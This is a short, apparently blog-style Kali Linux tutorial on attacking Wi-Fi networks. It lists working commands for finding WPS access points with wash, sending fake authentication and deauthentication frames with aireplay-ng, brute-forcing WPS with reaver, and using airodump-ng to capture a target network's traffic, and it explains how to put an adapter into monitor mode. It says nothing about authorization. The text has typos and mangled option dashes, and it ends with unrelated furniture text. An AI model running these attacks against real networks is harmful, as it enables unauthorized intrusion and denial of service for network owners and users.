How to get wireless with WPS enabled

we will use a program named wash

root@kali:~# wash -i wlan0

where wlan0 is the wireless network interface

root@kali:~# aireplay-ng –fakeauth 30 -a E4:8F:34:37:BA:0C -h 7C:8B:CA:1B:D8:31 wlan0

root@kali:~# reaver –bssid E4:8F:34:37:BA:0C –channel 2 –interface wlan0 -vvv –no-associate

deauthentication to intercept the handshake:

root@kali:~# aireplay-ng –deauth 4 -a E4:8F:34:37:BA:0C -c 80:35:C1:52:D8:E3 wlan0


With a wireless adapter in monitor mode you are able to sniff packet in the air:

at least the one in our range

even if we are not connected to that network

even if it’s not directed to our PC

To do this we need airodump-ng command, part of the aircrack-ng suite.

It a program design to capture packet with a wireless adapter in monitor mode


root@kali:~# airodump-ng wlan0

By default the airodum-ng shows only 2.4Ghz network frequency.

To get 5Ghz wireless frequency add –band a parameter, like this:

root@kali:~# airodump-ng --band a wlan0

Hte main bands are:

  • a, 5Ghz
  • b and g, 2.4Ghz
  • n, 5Ghz an 2.4 Ghz
  • ac lower than 6Ghz

It’s possible to use more than one basnds in the command line. The following command will show both 2.4Ghz and 5Ghz wireless:

root@kali:~# airodump-ng --band abg wlan0

Save sniffed data into a file:

root@kali:~# airodump-ng --bssid E4:8F:34:37:BA:0C --channel 2 --write test wlan0

In this case we write into the “test” file all packets sniffed from network whic mac address is E4:8F:34:37:BA:0C and channel 2.

the encrypted data sent to and from that target network are saved into the “cap” file

How to set wireless adapter in monitor mode

Get the wireless id


put it down

ifconfig wlan0 down

to kill any process that could interfere with using our interface (not mandatory)

airmon-ng check kill

Enable monitor mode

iwconfig wlan0 mode monitor

put wireless netowrk up again

ifconfig wlan0 up

linux network command line

ifconfig, show all network interfaces


root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet netmask broadcast
inet6 fe80::20c:29ff:feae:2778 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:ae:27:78 txqueuelen 1000 (Ethernet)
RX packets 53526 bytes 79273540 (75.6 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18397 bytes 1117190 (1.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet netmask
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 97 bytes 7040 (6.8 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 97 bytes 7040 (6.8 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 2312
ether ba:d7:b2:b4:4d:a8 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

iwconfig, show only all wireless network interfaces


root@kali:~# iwconfig

lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     unassociated  Nickname:”<WIFI@REALTEK>”

          Mode:Auto  Frequency=2.412 GHz  Access Point: Not-Associated   


          Retry:off   RTS thr:off   Fragment thr:off

          Encryption key:off

          Power Management:off

          Link Quality=0/100  Signal level=0 dBm  Noise level=0 dBm

          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0

          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

The most interesting thing of iwconfig command is the Mode.


Divani componibili

Collezione Sofangel